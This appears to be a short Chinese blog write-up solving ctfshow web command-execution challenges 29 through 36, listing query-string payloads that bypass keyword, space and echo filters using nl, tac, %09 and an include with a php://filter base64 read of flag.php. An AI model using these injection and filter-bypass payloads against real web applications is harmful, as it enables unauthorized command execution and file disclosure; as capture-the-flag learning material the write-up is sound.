ctfshow-web入门命令执行29

一本正经光头强2023-10-30 15:33

29

源代码给了禁用flag

使用tac、nl

复制代码 
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
CriticalThinking13 小时前
在xshell中使用ssh隧道访问远程服务
linux·网络·ssh
爱装代码的小瓶子13 小时前
安工大题目分类(含解析和翻译)
linux·网络·c
天青色等烟雨..13 小时前
智慧农林核心遥感技术99个案例实践
运维·人工智能·spring boot·后端·自动化
数智化精益手记局13 小时前
拆解复杂项目管理流程:用项目管理流程解决跨部门协作低效难题
大数据·运维·数据库·人工智能·产品运营
Solis程序员14 小时前
长会话状态治理(下):数据更新机制、并发保护与可复用设计原则
运维·服务器
IpdataCloud14 小时前
跨境支付如何识别高风险IP?用IP风险画像服务选型与集成指南
服务器·网络·数据库·tcp/ip·安全
是个西兰花14 小时前
linux:命名管道与共享内存
linux·运维·服务器·网络·c++
Snasph14 小时前
Linux 日志流水线深度解析:syslog() → journald → rsyslog → /var/log/syslog
linux·syslog·rsyslog
凡人叶枫14 小时前
Effective C++ 条款08:别让异常逃离析构函数
java·linux·数据库·c++·嵌入式开发
新时代牛马14 小时前
内核调试方法
linux·学习
热门推荐
01HTTP 与 HTTPS 的区别:从原理到实战详解02《置身钉内》原文-可播放阅读03【AI】2026 年具身智能模型和世界模型总结042026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?05GitHub 镜像站点062026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?07Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析08AI科技热点日报 | 2026年6月1日09AI一周事件 · 2026-06-03 至 2026-06-09102026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf